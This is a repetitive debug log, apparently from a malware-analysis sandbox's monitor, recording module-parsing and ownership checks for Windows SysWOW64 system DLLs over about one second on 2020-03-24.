2020-03-24 10:13:25,618 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,634 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,634 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,634 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,634 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,664 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,664 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,664 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,664 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,664 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,664 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,680 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,680 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,680 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,696 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,696 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,696 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,696 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,696 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,696 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,696 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,711 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,711 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,726 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,726 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,726 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,743 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,743 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,743 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,743 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,743 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,743 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:25,743 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:25,743 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:25,743 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:25,757 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:25,773 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:25,789 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:25,789 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:25,789 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:25,789 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:25,805 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,805 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,805 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,805 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:25,805 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,805 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,821 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,821 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,835 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,835 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,835 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,851 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,851 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,851 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,851 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,851 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,868 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,868 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,868 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:25,868 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,882 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,882 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,882 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,914 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,914 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:25,930 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:25,930 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:25,930 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:25,930 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:25,930 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:25,930 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:25,930 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:25,930 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:25,930 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:25,930 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:25,930 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:25,946 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:25,960 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:25,960 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:25,960 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,960 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,960 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,960 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,960 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,960 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,960 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,960 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,960 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:25,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:25,992 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,992 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,007 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,007 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,007 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:26,023 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:26,023 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,023 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,023 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,039 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,039 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,055 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,055 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,055 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:26,055 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:26,069 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,069 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,069 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,085 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,085 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,085 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,085 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,085 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,085 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,101 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,101 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,117 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,117 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,117 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,132 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,132 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,132 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,132 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,132 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,132 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,132 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:26,132 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,148 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,164 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,164 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,164 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,164 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,164 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:26,180 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:26,180 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:26,180 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,180 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,194 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,194 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,194 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,226 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,226 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,226 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,226 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,226 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,226 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,226 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:26,226 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:26,242 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,257 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,257 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,257 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,273 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,273 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,273 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,273 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,273 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,289 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,289 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,289 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,289 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,303 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,303 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,303 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,319 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,335 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,335 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,335 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,335 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:26,335 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,335 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,335 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,351 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,367 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,367 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,381 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,381 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,381 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:26,381 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:26,381 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:26,398 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
